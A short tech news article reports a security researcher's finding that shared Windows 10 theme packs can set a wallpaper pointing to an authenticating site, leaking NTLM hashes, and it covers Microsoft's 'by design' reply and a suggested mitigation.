A new finding claims that custom Windows 10 themes can allow hackers to steal user credentials. According to the findings published by security researcher Jimmy Bayne (@bohops) (via Beeping Computer), custom themes can be used to perform Pass-the-Hash attacks on Windows 10 users.

He noted that custom user-created Windows 10 themes are stored under “%AppData%\Microsoft\Windows\Themes ” with “.theme” extension. These themes can then be shared using the “Save theme for sharing” setting that creates a “.deskthemepack” file which can be sent through email. Hackers can use this as a way to add a default wallpaper that points to a website requiring authentication. When a user types credentials, an NTLM hash and login name is sent for authentication which can be used by the hacker to dehash and access the credentials.

Since Windows 10 uses a Microsoft account, it makes users more vulnerable to attacks. Moreover, it can also allow hackers to steal account credentials of other services like Azure, Office, and more that use Microsoft accounts for authentication.

Bayne said that he forwarded his findings Microsoft earlier this year but the company said it won’t fix the issue as it is a “feature by design.” Jimmy suggested that users can block or re-associate the .theme, .themepack, and .desktopthemepackfile extensions to a different program, thereby breaking the feature but that should be used as a last resort because users won’t be able to change Windows 10 themes.

Comments